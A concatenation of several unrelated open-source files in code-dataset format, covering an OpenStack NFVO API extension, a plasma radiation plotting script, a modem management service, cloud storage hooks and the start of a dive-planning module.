'allow_put': False,
'is_visible': True,
},
'attributes': {
'allow_post': True,
'allow_put': False,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'mgmt_ip_addresses': {
'allow_post': False,
'allow_put': False,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
},
'nsd_template': {
'allow_post': True,
'allow_put': False,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
},
}
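# Illustrative sketch (not taken from the Tacker API reference): a VIM
# registration matching the 'vims' attribute map above would carry roughly
#   {"type": "openstack", "name": "VIM-1",
#    "auth_url": "http://controller:5000/v3",
#    "auth_cred": {"username": "admin", "password": "secret"},
#    "vim_project": {"name": "admin"}, "is_default": False}
# where every value is a made-up example.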
class Nfvo(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return 'NFV Orchestrator'
@classmethod
def get_alias(cls):
return 'NFVO'
@classmethod
def get_description(cls):
return "Extension for NFV Orchestrator"
@classmethod
def get_namespace(cls):
return 'https://wiki.openstack.org/Tacker'
@classmethod
def get_updated(cls):
return "2015-12-21T10:00:00-00:00"
@classmethod
def get_resources(cls):
special_mappings = {}
plural_mappings = resource_helper.build_plural_mappings(
special_mappings, RESOURCE_ATTRIBUTE_MAP)
attr.PLURALS.update(plural_mappings)
return resource_helper.build_resource_info(
plural_mappings, RESOURCE_ATTRIBUTE_MAP, constants.NFVO,
translate_name=True)
@classmethod
def get_plugin_interface(cls):
return NFVOPluginBase
def update_attributes_map(self, attributes):
super(Nfvo, self).update_attributes_map(
attributes, extension_attrs_map=RESOURCE_ATTRIBUTE_MAP)
def get_extended_resources(self, version):
version_map = {'1.0': RESOURCE_ATTRIBUTE_MAP}
return version_map.get(version, {})
class NFVOPluginBase(service_base.NFVPluginBase, metaclass=abc.ABCMeta):
def get_plugin_name(self):
return constants.NFVO
def get_plugin_type(self):
return constants.NFVO
def get_plugin_description(self):
return 'Tacker NFV Orchestrator plugin'
@abc.abstractmethod
def create_vim(self, context, vim):
pass
@abc.abstractmethod
def update_vim(self, context, vim_id, vim):
pass
@abc.abstractmethod
def delete_vim(self, context, vim_id):
pass
@abc.abstractmethod
def get_vim(self, context, vim_id, fields=None, mask_password=True):
pass
@abc.abstractmethod
def get_vims(self, context, filters=None, fields=None):
pass
def get_vim_by_name(self, context, vim_name, fields=None,
mask_password=True):
raise NotImplementedError()
def get_default_vim(self, context):
pass
| apache-2.0 | -2,946,161,441,141,614,000 | 28.120309 | 79 | 0.522003 | false | 3.883279 | false | false | false |
cfe316/atomic | examples/profiles.py | 1 | 3300 | """
typical carbon content is n_c / n_e = 0.05
"""
import numpy as np
import matplotlib.pyplot as plt
import atomic
from ensemble_average import annotate_lines
def parabolic_profile(y0):
x = np.linspace(1., 0, 50)
y = 1 - x**2
y *= y0
return x, y
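# Added note: parabolic_profile(y0) returns a radial coordinate running from
# the edge (x=1) to the axis (x=0) and the parabolic profile y = y0 * (1 - x**2),
# which vanishes at the edge and reaches y0 on axis; parabolic_profile(3e3)
# below therefore builds a 3 keV core temperature profile.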
r, temperature = parabolic_profile(3e3)
r, density = parabolic_profile(1e19)
try:
ad
except NameError:
from atomic.pec import TransitionPool
ad = atomic.element('argon')
tp = TransitionPool.from_adf15('adas_data/transport_llu#ar*.dat')
ad = tp.filter_energy(2e3, 20e3, 'eV').create_atomic_data(ad)
eq = atomic.CollRadEquilibrium(ad)
y = eq.ionisation_stage_distribution(temperature, density)
ne_tau = np.array([1e-1, 1e-2, 1e-3])
impurity_fraction = 0.05
texts = ['$10^{%d}$' % i for i in np.log10(ne_tau)]
try:
tau_ss
except NameError:
t_normalized = np.logspace(-4, 0, 500)
t_normalized -= t_normalized[0]
times = t_normalized
rt = atomic.RateEquations(ad)
yy = rt.solve(times, temperature, density)
tau_ss = yy.steady_state_time()
y_bar = yy.ensemble_average()
# prepare plots
f = plt.figure(1); f.clf()
ax1 = f.add_subplot(511)
ax2 = f.add_subplot(512, sharex=ax1)
#ax3 = f.add_subplot(513, sharex=ax1)
ax4 = f.add_subplot(513, sharex=ax1)
ax5 = f.add_subplot(514, sharex=ax1)
ax6 = f.add_subplot(515, sharex=ax1)
# density and temperature profiles
ax = ax1
ax.plot(r,density/1e19, r, temperature/1e3)
ax.set_xlabel(r'$\rho$')
# steady state time
ax = ax2
line, = ax.semilogy(r, tau_ss)
ax.set_ylabel(r'$\tau_\mathrm{ss}\ [s]$')
ax.set_ylim(ymax=2)
# fractional abundance
#ax = ax3
#lines_abundance = ax.semilogy(r, y.y.T*100)
#ax.set_ylim(0.3, 400)
#yy.y_collrad.replot_colored(line, lines_abundance)
def normalized_gradient(x, y):
return -np.gradient(y)/np.gradient(x)/y
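# Added note: this is the inverse gradient scale length -(1/y) dy/dx, here in
# units of the normalized radius, so rlte below is the normalized temperature
# gradient and rlrad the equivalent for the radiated power profile.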
# fractional abundance, Zeff, Zmean
y_selected = y_bar.select_times(ne_tau)
for y in y_selected:
#ax3.semilogy(r, y.y[-1,:].T*100, color='black')
#lines = ax4.plot(r, y.effective_charge(impurity_fraction),
# color='black', ls='--')
rad = atomic.Radiation(y, impurity_fraction=impurity_fraction)
total_power = rad.power['total']
ax4.plot(r, total_power)
radiation_parameter = total_power / (impurity_fraction * density)
line, = ax5.plot(r, radiation_parameter)
rlte = normalized_gradient(r, temperature)
rlrad = normalized_gradient(r, total_power)
ax6.plot(r, rlrad)
ax6.plot(r, rlte, 'k--')
ax6.set_ylim(0,10)
#from matplotlib.ticker import FormatStrFormatter
#ax = ax3
#major_formatter = FormatStrFormatter('$%d\%%$')
#ax.yaxis.set_major_formatter(major_formatter)
#y.annotate_ionisation_stages(lines_abundance)
from matplotlib.ticker import MaxNLocator
ax = ax4
locator = MaxNLocator(4)
ax.set_ylabel(r'$Z_\mathrm{eff}$')
ax.yaxis.set_major_locator(locator)
lo, hi = ax.get_ylim()
ax.set_ylim(lo, 1.1 * hi)
annotate_lines(texts, ha='left', va='bottom', ax=ax)
# radiation profile
ax = ax5
ax.set_yticks(ax.get_yticks()[:-1:2])
annotate_lines(texts, ha='left', va='bottom', ax=ax)
locator = MaxNLocator(4)
ax.yaxis.set_major_locator(locator)
# position subplots
for ax in f.axes:
if not ax.is_last_row(): ax.get_xaxis().label.set_visible(False)
ax.label_outer()
#f.subplots_adjust(hspace=0)
plt.draw()
plt.show()
| mit | -2,027,741,804,067,600,400 | 23.087591 | 69 | 0.680606 | false | 2.614897 | false | false | false |
krfkeith/enough | livec/codegui/EnumWidget.py | 3 | 1748 | # Copyright (c) 2007 Enough Project.
# See LICENSE for details.
from gui.Box import VBox, HBox
from gui.TextEdit import TextEdit, make_label
from codegui.loop import loop
from codegui.widget_for import NormalWidgetMaker, indented
import style
from lib.observable.List import List
from functools import partial
class EnumWidget(VBox):
# TODO: emphasize_value should be a proxy?
def __init__(self, enum_proxy, emphasize_value=None):
self.enum = enum_proxy.get()
self._comma = make_label(style.comma, ',')
values_box = VBox(List([
self._value_widget(value_proxy, index!=len(self.enum.values)-1,
emphasize_value)
for index, value_proxy in enumerate(self.enum.values)
]))
VBox.__init__(self, List([
HBox(List([
make_label(style.enum, 'enum'),
make_label(style.space, ' '),
make_label(style.type_, loop.namer.get_name(self.enum)),
]), relay_focus=True),
make_label(style.braces, '{'),
indented(values_box),
HBox(List([
make_label(style.braces, '}'),
make_label(style.semicolon, ';'),
]), relay_focus=True)
]))
def _value_widget(self, value_proxy, with_comma, emphasize_value):
value = value_proxy.get()
s = style.enum_value
if value is emphasize_value:
s = style.emphasize(s)
l = [
TextEdit(s, partial(loop.namer.get_name, value)),
make_label(style.operator, ' = '),
NormalWidgetMaker.make(value.value),
]
if with_comma:
l.append(self._comma)
return HBox(List(l))
| gpl-3.0 | -7,926,893,740,873,075,000 | 32.615385 | 75 | 0.566934 | false | 3.70339 | false | false | false |
rajeevs1992/pyhealthvault | src/healthvaultlib/methods/getupdatedrecordsforapplication.py | 1 | 1686 | from lxml import etree
from healthvaultlib.methods.method import Method
from healthvaultlib.objects.updatedrecord import UpdatedRecord
from healthvaultlib.methods.methodbase import RequestBase, ResponseBase
class GetUpdatedRecordsForApplicationRequest(RequestBase):
'''
Gets a list of records for an application with things that have
been updated since a specified date.
Attributes:
        update_date  Optionally provide an updated-since date,
of type datetime.datetime
'''
def __init__(self):
super(GetUpdatedRecordsForApplicationRequest, self).__init__()
self.name = 'GetUpdatedRecordsForApplication'
self.version = 1
self.update_date = None
def get_info(self):
info = etree.Element('info')
if self.update_date is not None:
update_date = etree.Element('update-date')
update_date.text = self.update_date.isoformat()
info.append(update_date)
return info
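        # Illustrative only: with update_date = datetime(2015, 6, 1) this
        # serialises to
        #   <info><update-date>2015-06-01T00:00:00</update-date></info>
        # while leaving update_date as None produces an empty <info/>.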
class GetUpdatedRecordsForApplicationResponse(ResponseBase):
def __init__(self):
super(GetUpdatedRecordsForApplicationResponse, self).__init__()
self.name = 'GetUpdatedRecordsForApplication'
self.version = 1
self.updated_records = []
def parse_response(self, response):
self.parse_info(response)
for i in self.info.xpath('record-id'):
self.updated_records.append(UpdatedRecord(i))
class GetUpdatedRecordsForApplication(Method):
def __init__(self):
self.request = GetUpdatedRecordsForApplicationRequest()
self.response = GetUpdatedRecordsForApplicationResponse()
| mit | 4,035,345,967,672,432,000 | 32.058824 | 71 | 0.67675 | false | 4.556757 | false | false | false |
lwindg/sanji-bundle-cellular | index.py | 3 | 16773 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import os
from threading import Thread
from traceback import format_exc
from sanji.connection.mqtt import Mqtt
from sanji.core import Sanji
from sanji.core import Route
from sanji.model_initiator import ModelInitiator
from voluptuous import All, Any, Length, Match, Range, Required, Schema
from voluptuous import REMOVE_EXTRA, Optional, In
from cellular_utility.cell_mgmt import CellMgmt, CellMgmtError
from cellular_utility.cell_mgmt import CellAllModuleNotSupportError
from cellular_utility.management import Manager
from cellular_utility.vnstat import VnStat, VnStatError
from sh import rm, service
if __name__ == "__main__":
FORMAT = "%(asctime)s - %(levelname)s - %(lineno)s - %(message)s"
logging.basicConfig(level=logging.INFO, format=FORMAT)
_logger = logging.getLogger("sanji.cellular")
class Index(Sanji):
CONF_PROFILE_SCHEMA = Schema(
{
Required("apn", default="internet"):
All(Any(unicode, str), Length(0, 100)),
Optional("type", default="ipv4v6"):
In(frozenset(["ipv4", "ipv6", "ipv4v6"])),
Optional("auth", default={}): {
Required("protocol", default="none"):
In(frozenset(["none", "chap", "pap", "both"])),
Optional("username"):
All(Any(unicode, str), Length(0, 255)),
Optional("password"):
All(Any(unicode, str), Length(0, 255))
}
},
extra=REMOVE_EXTRA)
CONF_SCHEMA = Schema(
{
"id": int,
Required("enable"): bool,
Required("pdpContext"): {
Required("static"): bool,
Required("id"): int,
Required("retryTimeout", default=120): All(
int,
Any(0, Range(min=10, max=86400 - 1))
),
Required("primary"): CONF_PROFILE_SCHEMA,
Required("secondary", default={}): CONF_PROFILE_SCHEMA
},
Required("pinCode", default=""): Any(Match(r"[0-9]{4,8}"), ""),
Required("keepalive"): {
Required("enable"): bool,
Required("targetHost"): basestring,
Required("intervalSec"): All(
int,
Any(0, Range(min=60, max=86400 - 1))
),
Required("reboot",
default={"enable": False, "cycles": 1}): {
Required("enable", default=False): bool,
Required("cycles", default=1): All(
int,
Any(0, Range(min=1, max=48))),
}
}
},
extra=REMOVE_EXTRA)
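    # Illustrative configuration accepted by CONF_SCHEMA above (values are
    # examples, not shipped defaults):
    #   {"enable": True,
    #    "pdpContext": {"static": False, "id": 1, "retryTimeout": 120,
    #                   "primary": {"apn": "internet", "type": "ipv4v6",
    #                               "auth": {"protocol": "none"}},
    #                   "secondary": {}},
    #    "pinCode": "",
    #    "keepalive": {"enable": True, "targetHost": "8.8.8.8",
    #                  "intervalSec": 60,
    #                  "reboot": {"enable": False, "cycles": 1}}}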
def init(self, *args, **kwargs):
path_root = os.path.abspath(os.path.dirname(__file__))
self.model = ModelInitiator("cellular", path_root)
self.model.db[0] = Index.CONF_SCHEMA(self.model.db[0])
self._dev_name = None
self._mgr = None
self._vnstat = None
self.__init_monit_config(
enable=(self.model.db[0]["enable"] and
self.model.db[0]["keepalive"]["enable"] and True and
self.model.db[0]["keepalive"]["reboot"]["enable"] and
True),
target_host=self.model.db[0]["keepalive"]["targetHost"],
iface=self._dev_name,
cycles=self.model.db[0]["keepalive"]["reboot"]["cycles"]
)
self._init_thread = Thread(
name="sanji.cellular.init_thread",
target=self.__initial_procedure)
self._init_thread.daemon = True
self._init_thread.start()
def __initial_procedure(self):
"""
Continuously check Cellular modem existence.
Set self._dev_name, self._mgr, self._vnstat properly.
"""
cell_mgmt = CellMgmt()
wwan_node = None
for retry in xrange(0, 4):
if retry == 3:
return
try:
wwan_node = cell_mgmt.m_info().wwan_node
break
except CellAllModuleNotSupportError:
break
except CellMgmtError:
_logger.warning("get wwan_node failure: " + format_exc())
cell_mgmt.power_cycle(timeout_sec=60)
self._dev_name = wwan_node
self.__init_monit_config(
enable=(self.model.db[0]["enable"] and
self.model.db[0]["keepalive"]["enable"] and True and
self.model.db[0]["keepalive"]["reboot"]["enable"] and
True),
target_host=self.model.db[0]["keepalive"]["targetHost"],
iface=self._dev_name,
cycles=self.model.db[0]["keepalive"]["reboot"]["cycles"]
)
self.__create_manager()
self._vnstat = VnStat(self._dev_name)
def __create_manager(self):
pin = self.model.db[0]["pinCode"]
if "primary" in self.model.db[0]["pdpContext"]:
pdpc_primary_apn = \
self.model.db[0]["pdpContext"]["primary"].get(
"apn", "internet")
pdpc_primary_type = \
self.model.db[0]["pdpContext"]["primary"].get("type", "ipv4v6")
pdpc_primary_auth = \
self.model.db[0]["pdpContext"]["primary"].get("auth", {})
else:
pdpc_primary_apn = "internet"
pdpc_primary_type = "ipv4v6"
pdpc_primary_auth = {}
if "secondary" in self.model.db[0]["pdpContext"]:
pdpc_secondary_apn = \
self.model.db[0]["pdpContext"]["secondary"].get("apn", "")
pdpc_secondary_type = \
self.model.db[0]["pdpContext"]["secondary"].get(
"type", "ipv4v6")
pdpc_secondary_auth = \
self.model.db[0]["pdpContext"]["secondary"].get("auth", {})
else:
pdpc_secondary_apn = ""
pdpc_secondary_type = "ipv4v6"
pdpc_secondary_auth = {}
pdpc_retry_timeout = self.model.db[0]["pdpContext"]["retryTimeout"]
self._mgr = Manager(
dev_name=self._dev_name,
enabled=self.model.db[0]["enable"],
pin=None if pin == "" else pin,
pdp_context_static=self.model.db[0]["pdpContext"]["static"],
pdp_context_id=self.model.db[0]["pdpContext"]["id"],
pdp_context_primary_apn=pdpc_primary_apn,
pdp_context_primary_type=pdpc_primary_type,
pdp_context_primary_auth=pdpc_primary_auth.get("protocol", "none"),
pdp_context_primary_username=pdpc_primary_auth.get("username", ""),
pdp_context_primary_password=pdpc_primary_auth.get("password", ""),
pdp_context_secondary_apn=pdpc_secondary_apn,
pdp_context_secondary_type=pdpc_secondary_type,
pdp_context_secondary_auth=pdpc_secondary_auth.get(
"protocol", "none"),
pdp_context_secondary_username=pdpc_secondary_auth.get(
"username", ""),
pdp_context_secondary_password=pdpc_secondary_auth.get(
"password", ""),
pdp_context_retry_timeout=pdpc_retry_timeout,
keepalive_enabled=self.model.db[0]["keepalive"]["enable"],
keepalive_host=self.model.db[0]["keepalive"]["targetHost"],
keepalive_period_sec=self.model.db[0]["keepalive"]["intervalSec"],
log_period_sec=60)
# clear PIN code if pin error
if self._mgr.status() == Manager.Status.pin_error and pin != "":
self.model.db[0]["pinCode"] = ""
self.model.save_db()
self._mgr.set_update_network_information_callback(
self._publish_network_info)
self._mgr.start()
def __init_completed(self):
if self._init_thread is None:
return True
self._init_thread.join(0)
if self._init_thread.is_alive():
return False
self._init_thread = None
return True
def __init_monit_config(
self, enable=False, target_host="8.8.8.8", iface="", cycles=1):
if enable is False:
rm("-rf", "/etc/monit/conf.d/keepalive")
service("monit", "restart")
return
ifacecmd = "" if iface == "" or iface is None \
else "-I {}".format(iface)
config = """check program ping-test with path "/bin/ping {target_host} {ifacecmd} -c 3 -W 20"
if status != 0
then exec "/bin/bash -c '/usr/sbin/cell_mgmt power_off force && /bin/sleep 5 && /usr/local/sbin/reboot -i -f -d'"
every {cycles} cycles
""" # noqa
with open("/etc/monit/conf.d/keepalive", "w") as f:
f.write(config.format(
target_host=target_host, ifacecmd=ifacecmd, cycles=cycles))
service("monit", "restart")
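    # Illustrative only: with enable=True, target_host="8.8.8.8",
    # iface="wwan0" and cycles=3, the file written above reads:
    #   check program ping-test with path "/bin/ping 8.8.8.8 -I wwan0 -c 3 -W 20"
    #       if status != 0
    #       then exec "/bin/bash -c '/usr/sbin/cell_mgmt power_off force && ...'"
    #       every 3 cycles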
@Route(methods="get", resource="/network/cellulars")
def get_list(self, message, response):
if not self.__init_completed():
return response(code=200, data=[])
if (self._dev_name is None or
self._mgr is None or
self._vnstat is None):
return response(code=200, data=[])
return response(code=200, data=[self._get()])
@Route(methods="get", resource="/network/cellulars/:id")
def get(self, message, response):
if not self.__init_completed():
return response(code=400, data={"message": "resource not exist"})
id_ = int(message.param["id"])
if id_ != 1:
return response(code=400, data={"message": "resource not exist"})
return response(code=200, data=self._get())
PUT_SCHEMA = CONF_SCHEMA
@Route(methods="put", resource="/network/cellulars/:id", schema=PUT_SCHEMA)
def put(self, message, response):
if not self.__init_completed():
return response(code=400, data={"message": "resource not exist"})
id_ = int(message.param["id"])
if id_ != 1:
return response(code=400, data={"message": "resource not exist"})
_logger.info(str(message.data))
data = Index.PUT_SCHEMA(message.data)
data["id"] = id_
_logger.info(str(data))
# always use the 1st PDP context for static
if data["pdpContext"]["static"] is True:
data["pdpContext"]["id"] = 1
# since all items are required in PUT,
# its schema is identical to cellular.json
self.model.db[0] = data
self.model.save_db()
if self._mgr is not None:
self._mgr.stop()
self._mgr = None
self.__create_manager()
self.__init_monit_config(
enable=(self.model.db[0]["enable"] and
self.model.db[0]["keepalive"]["enable"] and True and
self.model.db[0]["keepalive"]["reboot"]["enable"] and
True),
target_host=self.model.db[0]["keepalive"]["targetHost"],
iface=self._dev_name,
cycles=self.model.db[0]["keepalive"]["reboot"]["cycles"]
)
# self._get() may wait until start/stop finished
return response(code=200, data=self.model.db[0])
def _get(self):
name = self._dev_name
if name is None:
name = "n/a"
config = self.model.db[0]
status = self._mgr.status()
minfo = self._mgr.module_information()
sinfo = self._mgr.static_information()
cinfo = self._mgr.cellular_information()
ninfo = self._mgr.network_information()
try:
pdpc_list = self._mgr.pdp_context_list()
except CellMgmtError:
pdpc_list = []
try:
self._vnstat.update()
usage = self._vnstat.get_usage()
except VnStatError:
usage = {
"txkbyte": -1,
"rxkbyte": -1
}
# clear PIN code if pin error
if (config["pinCode"] != "" and
status == Manager.Status.pin):
config["pinCode"] = ""
self.model.db[0] = config
self.model.save_db()
config["pdpContext"]["primary"] = \
Index.CONF_PROFILE_SCHEMA(config["pdpContext"]["primary"])
config["pdpContext"]["secondary"] = \
Index.CONF_PROFILE_SCHEMA(config["pdpContext"]["secondary"])
config["pdpContext"]["list"] = pdpc_list
return {
"id": config["id"],
"name": name,
"mode": "" if cinfo is None else cinfo.mode,
"signal": {"csq": 0, "rssi": 0, "ecio": 0.0} if cinfo is None else
{"csq": cinfo.signal_csq,
"rssi": cinfo.signal_rssi_dbm,
"ecio": cinfo.signal_ecio_dbm},
"operatorName": "" if cinfo is None else cinfo.operator,
"lac": "" if cinfo is None else cinfo.lac,
"tac": "" if cinfo is None else cinfo.tac,
"nid": "" if cinfo is None else cinfo.nid,
"cellId": "" if cinfo is None else cinfo.cell_id,
"bid": "" if cinfo is None else cinfo.bid,
"imsi": "" if sinfo is None else sinfo.imsi,
"iccId": "" if sinfo is None else sinfo.iccid,
"imei": "" if minfo is None else minfo.imei,
"esn": "" if minfo is None else minfo.esn,
"pinRetryRemain": (
-1 if sinfo is None else sinfo.pin_retry_remain),
"status": status.name,
"mac": "00:00:00:00:00:00" if minfo is None else minfo.mac,
"ip": "" if ninfo is None else ninfo.ip,
"netmask": "" if ninfo is None else ninfo.netmask,
"gateway": "" if ninfo is None else ninfo.gateway,
"dns": [] if ninfo is None else ninfo.dns_list,
"usage": {
"txkbyte": usage["txkbyte"],
"rxkbyte": usage["rxkbyte"]
},
"enable": config["enable"],
"pdpContext": config["pdpContext"],
"pinCode": config["pinCode"],
"keepalive": {
"enable": config["keepalive"]["enable"],
"targetHost": config["keepalive"]["targetHost"],
"intervalSec": config["keepalive"]["intervalSec"],
"reboot": {
"enable": config["keepalive"]["reboot"]["enable"],
"cycles": config["keepalive"]["reboot"]["cycles"]
}
}
}
def _publish_network_info(
self,
nwk_info):
name = self._dev_name
if name is None:
_logger.error("device name not available")
return
data = {
"name": name,
"wan": True,
"type": "cellular",
"mode": "dhcp",
"status": nwk_info.status,
"ip": nwk_info.ip,
"netmask": nwk_info.netmask,
"gateway": nwk_info.gateway,
"dns": nwk_info.dns_list
}
_logger.info("publish network info: " + str(data))
self.publish.event.put("/network/interfaces/{}".format(name),
data=data)
@Route(methods="get", resource="/network/cellulars/:id/firmware")
def get_fw(self, message, response):
if not self.__init_completed():
return response(code=400, data={"message": "resource not exist"})
id_ = int(message.param["id"])
if id_ != 1:
return response(code=400, data={"message": "resource not exist"})
m_info = self._mgr._cell_mgmt.m_info()
if m_info.module != "MC7354":
return response(code=200, data={
"switchable": False,
"current": None,
"preferred": None,
"avaliable": None
})
fw_info = self._mgr._cell_mgmt.get_cellular_fw()
return response(code=200, data=fw_info)
@Route(methods="put", resource="/network/cellulars/:id/firmware")
def put_fw(self, message, response):
if not self.__init_completed():
return response(code=400, data={"message": "resource not exist"})
id_ = int(message.param["id"])
if id_ != 1:
return response(code=400, data={"message": "resource not exist"})
response(code=200)
self._mgr._cell_mgmt.set_cellular_fw(
fwver=message.data["fwver"],
config=message.data["config"],
carrier=message.data["carrier"]
)
if __name__ == "__main__":
cellular = Index(connection=Mqtt())
cellular.start()
| gpl-2.0 | -4,546,295,228,002,981,000 | 35.863736 | 117 | 0.524593 | false | 3.895262 | true | false | false |
wxiang7/airflow | airflow/contrib/hooks/gcloud/gcs_hook.py | 3 | 5781 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from future.standard_library import install_aliases
install_aliases()
from airflow.contrib.hooks.gcloud.base_hook import GCPBaseHook
from urllib.parse import urlparse
from airflow.utils import AirflowException
import gcloud.storage
def parse_gcs_url(gsurl):
"""
Given a Google Cloud Storage URL (gs://<bucket>/<blob>), returns a
tuple containing the corresponding bucket and blob.
"""
parsed_url = urlparse(gsurl)
if not parsed_url.netloc:
raise AirflowException('Please provide a bucket name')
else:
bucket = parsed_url.netloc
blob = parsed_url.path.strip('/')
return (bucket, blob)
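# Illustrative only:
#   parse_gcs_url("gs://my-bucket/path/to/blob.txt")
#   returns ("my-bucket", "path/to/blob.txt"), while a URL without a bucket
#   such as "gs:///blob.txt" raises AirflowException.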
class GCSHook(GCPBaseHook):
client_class = gcloud.storage.Client
def bucket_exists(self, bucket):
return self.client.bucket(bucket).exists()
def get_bucket(self, bucket):
return self.client.get_bucket(bucket)
def list_blobs(
self,
bucket,
max_results=None,
page_token=None,
prefix=None,
delimiter=None):
return self.client.bucket(bucket).list_blobs(
max_results=max_results,
page_token=page_token,
prefix=prefix,
delimiter=delimiter)
def get_blob(self, blob, bucket=None):
"""
Returns None if the blob does not exist
"""
if not bucket:
bucket, blob = parse_gcs_url(blob)
return self.client.bucket(bucket).get_blob(blob)
def blob_exists(self, blob, bucket=None):
if not bucket:
bucket, blob = parse_gcs_url(blob)
return self.client.bucket(bucket).blob(blob).exists()
def upload_from_file(
self,
file_obj,
blob,
bucket=None,
replace=False):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).blob(blob)
if gcs_blob.exists() and not replace:
raise ValueError(
'The blob {bucket}/{blob} already exists.'.format(**locals()))
gcs_blob.upload_from_file(file_obj)
def upload_from_filename(
self,
filename,
blob,
bucket=None,
replace=False):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).blob(blob)
if gcs_blob.exists() and not replace:
raise ValueError(
'The blob {bucket}/{blob} already exists.'.format(**locals()))
gcs_blob.upload_from_filename(filename)
def upload_from_string(
self,
string,
blob,
bucket=None,
replace=False):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).blob(blob)
if gcs_blob.exists() and not replace:
raise ValueError(
'The blob {bucket}/{blob} already exists.'.format(**locals()))
gcs_blob.upload_from_string(string)
def download_as_string(
self,
blob,
bucket=None):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).get_blob(blob)
if not gcs_blob:
raise ValueError(
'Blob does not exist: {bucket}/{blob}'.format(**locals()))
return gcs_blob.download_as_string()
def download_to_file(
self,
file_obj,
blob,
bucket=None):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).get_blob(blob)
if not gcs_blob:
raise ValueError(
'Blob does not exist: {bucket}/{blob}'.format(**locals()))
return gcs_blob.download_to_file(file_obj)
def download_to_filename(
self,
filename,
blob,
bucket=None):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).get_blob(blob)
if not gcs_blob:
raise ValueError(
'Blob does not exist: {bucket}/{blob}'.format(**locals()))
return gcs_blob.download_to_filename(filename)
# Compatibility methods
def download(
self,
bucket,
object,
filename=False):
"""
This method is provided for compatibility with
contrib/GoogleCloudStorageHook.
"""
if filename:
return self.download_to_filename(
filename=filename, blob=object, bucket=bucket)
else:
return self.download_as_string(blob=object, bucket=bucket)
def upload(
self,
bucket,
object,
filename,
mime_type='application/octet-stream'):
"""
This method is provided for compatibility with
contrib/GoogleCloudStorageHook.
Warning: acts as if replace == True!
"""
self.upload_from_filename(
filename=filename, blob=object, bucket=bucket, replace=True)
| apache-2.0 | -9,131,217,837,836,201,000 | 30.418478 | 78 | 0.577755 | false | 4.22279 | false | false | false |
MissionCriticalCloud/marvin | marvin/cloudstackAPI/updateCloudToUseObjectStore.py | 1 | 1997 | """Migrate current NFS secondary storages to use object store."""
from baseCmd import *
from baseResponse import *
class updateCloudToUseObjectStoreCmd (baseCmd):
typeInfo = {}
def __init__(self):
self.isAsync = "false"
"""the image store provider name"""
"""Required"""
self.provider = None
self.typeInfo['provider'] = 'string'
"""the details for the image store. Example: details[0].key=accesskey&details[0].value=s389ddssaa&details[1].key=secretkey&details[1].value=8dshfsss"""
self.details = []
self.typeInfo['details'] = 'map'
"""the name for the image store"""
self.name = None
self.typeInfo['name'] = 'string'
"""the URL for the image store"""
self.url = None
self.typeInfo['url'] = 'string'
self.required = ["provider", ]
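# Minimal usage sketch (hypothetical values; the apiclient call shown follows
# the usual Marvin pattern and is not defined in this module):
#   cmd = updateCloudToUseObjectStoreCmd()
#   cmd.provider = "S3"
#   cmd.url = "http://s3.example.com"
#   cmd.details = [{"key": "accesskey", "value": "..."}]
#   response = apiclient.updateCloudToUseObjectStore(cmd)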
class updateCloudToUseObjectStoreResponse (baseResponse):
typeInfo = {}
def __init__(self):
"""the ID of the image store"""
self.id = None
self.typeInfo['id'] = 'string'
"""the details of the image store"""
self.details = None
self.typeInfo['details'] = 'set'
"""the name of the image store"""
self.name = None
self.typeInfo['name'] = 'string'
"""the protocol of the image store"""
self.protocol = None
self.typeInfo['protocol'] = 'string'
"""the provider name of the image store"""
self.providername = None
self.typeInfo['providername'] = 'string'
"""the scope of the image store"""
self.scope = None
self.typeInfo['scope'] = 'scopetype'
"""the url of the image store"""
self.url = None
self.typeInfo['url'] = 'string'
"""the Zone ID of the image store"""
self.zoneid = None
self.typeInfo['zoneid'] = 'string'
"""the Zone name of the image store"""
self.zonename = None
self.typeInfo['zonename'] = 'string'
| apache-2.0 | -6,770,195,988,446,285,000 | 33.431034 | 159 | 0.577867 | false | 3.954455 | false | false | false |
ThomasChiroux/dipplanner | dipplanner/dive.py | 1 | 43456 | #
# Copyright 2011-2016 Thomas Chiroux
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.
# If not, see <http://www.gnu.org/licenses/gpl.html>
#
# This module is part of dipplanner, a Dive planning Tool written in python
"""Dive class module.
Each Dive represents one dive (and only one).
For successive dives, it is possible to provide the parameters of the
previous dive in order to calculate the next one.
"""
import logging
import copy
# dependencies imports
from jinja2 import Environment, PackageLoader
# local imports
from dipplanner import settings
from dipplanner.dipp_exception import DipplannerException
from dipplanner.model.buhlmann.model_exceptions import ModelException
from dipplanner.tank import Tank
from dipplanner.segment import SegmentDive, SegmentDeco, SegmentAscDesc
from dipplanner.model.buhlmann.model import Model as BuhlmannModel
from dipplanner.tools import calculate_pp_h2o_surf
from dipplanner.tools import depth_to_pressure
from dipplanner.tools import seconds_to_mmss
from dipplanner.tools import seconds_to_hhmmss
from dipplanner.tools import altitude_or_depth_to_absolute_pressure
class NothingToProcess(DipplannerException):
